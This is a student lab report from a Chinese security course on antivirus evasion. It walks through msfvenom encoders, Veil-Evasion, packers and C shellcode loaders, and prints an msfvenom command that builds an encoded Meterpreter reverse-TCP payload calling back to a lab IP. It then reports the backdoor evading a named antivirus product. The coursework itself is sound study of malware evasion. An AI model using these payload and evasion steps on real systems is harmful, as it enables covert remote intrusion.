• 20192429马一 202120222 《网络与系统攻防》实验三 免杀原理与实践


    20192429马一 2021-2022-2 《网络与系统攻防》实验三 免杀原理与实践

    一、实验内容

    1. 正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧
      • 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
      • veil,加壳工具
      • 使用C + shellcode编程
    2. 通过组合应用各种技术实现恶意代码免杀
    3. 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

    二、实验要求

    • 掌握免杀原理与技术

    三、实验步骤

    3.1msf veil-evasion 免杀

    • 实验二中的后门程序通过Virustotal进行检测
      LAnKk8.png

    3.1.1 正确使用MSF编码器

    LAn51H.md.png

    • 生成文件如下,并在Virustotal上进行检测
      LAnLAf.md.png

    3.1.2 生成java后门程序

    LAuCBq.md.png

    • 生成文件如下,并检测:
      LAuFEV.md.png

    3.1.3 生成PHP后门程序

    LAuZ34.md.png

    • 生成文件如下,并检测:
      LAu0VP.md.png

    3.2 veil-evasion

    • 输入 sudo apt-get install veil 进行安装
      LAu4aV.md.png

    • 使用veil生成后门程序
      进入配置环境 use c/meterpreter/rev_tcp.py
      设置反弹链接的ip和端口号,并查看结果
      输入 generate生成文件,并找到所在目录
      LAu724.md.png
      LAK8Zq.md.png

    • 通过veil生成的后门程序检测如下
      LAKJoV.md.png

    3.3 加壳技术

    3.3.1 压缩壳

    LAKIeI.md.png

    • 加壳后的文件检测如下:
      LAKHFf.md.png

    3.3.2 加密壳

    • wine hyperion.exe -v a.exe b.exe 为文件加密壳

    在进行加密壳的时候需要注意,如果直接在当前文件目录下输入指令,有可能无法成功,因为 Hyperion.exe并不保存在veil的目录下,而是在/usr/share/windows-resources/hyperion/,每个设备的地址可能有所出入。
    LAMt0I.md.png

    3.4 C+shellcode编程后门程序

    1. 生成一段shellcode
      LAMrcQ.md.png

    2. 创建一个文件,将 unsigned char buf[] 的内容赋值,并进行编译
      LAMojJ.md.png

    命令代码均在图片内容中,此处就不再打出了

    3.5 组合应用各种技术实现免杀

    1. 制作shellcode

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.31.133 lport=2429 -f c -o shell.c
    LAQ35V.md.png

    1. 通过k8飞刀将shellcode转化为hex:
      LAQy8O.md.png

    2. 检测ScRunHex.py
      LAlpGT.md.png

    3. 此时后门程序与杀软共生
      LAl8eA.md.png

    免杀原理:使用C+shellcode,然后将shellcode转化为hex,并且使用ScRunHex.py与python运行hex码,避免了杀软扫描到ScRunHex.exe的特征码,而同时使用了不同的编码方式混淆,杀软无法辨别真假。

    3.6 在另一台主机上实测

    • 杀软名称:联想电脑管家
    • 杀软版本:5.0.0.3292
      LA8bYq.md.png

    四、回答问题

    4.1 杀软是如何检测出恶意代码的

    • 根据特征码检测:恶意代码中有些独特的代码或机器码,这些特征代码存储在AV厂商的特征库中,如果该文件中有相应的特征码,则会被判断为恶意代码
    • 启发式检测:该程序的行为和恶意程序接近,比如提权等待,则会被判断为恶意程序

    4.2 免杀是做什么?

    • 免于被杀毒软件检测到并删除,就是一种逃避杀毒软件的方式

    4.3 免杀的基本方法有哪些

    • 改变特征码,或者隐藏特征码,即加壳的方式把原本的特征信息隐藏起来,不被扫描到
    • 加入多的正常功能代码,尽量减少对系统的修改,行为上伪装得像一个正常程序

    五、实验感想

    • 本次实验是在上次后门实验的基础上的进阶,需要我们熟练掌握和运用后门技术,在实验过程中,我了解了免杀的概念、免杀的基本方法,能够熟练使用VirusTotal、Virscan等工具,能够有条理、有目的的对后门动手实现一些免杀的处理。在实验过程中,我发现,即便一些程序没有被杀毒机构检测出有病毒特征,并不代表它就是安全软件,随着互联网的发展,病毒的隐藏性更强,越不容易被发现,我们在上网的时候应该尽量在官网下载正版软件,免于被植入后门程序。
  • 相关阅读:
    二 web爬虫,scrapy模块以及相关依赖模块安装
    一 web爬虫,requests请求
    Linux 常用命令大全
    HTTP响应状态码参考
    python-进程,线程,协程
    SVN图形管理工具-Submint
    python-Socket网络编程
    python基础-pickle与shelve
    python-面向对象
    10分钟看懂, Java NIO 底层原理
  • 原文地址:https://www.cnblogs.com/meeyee/p/16127424.html
Copyright © 2020-2023  润新知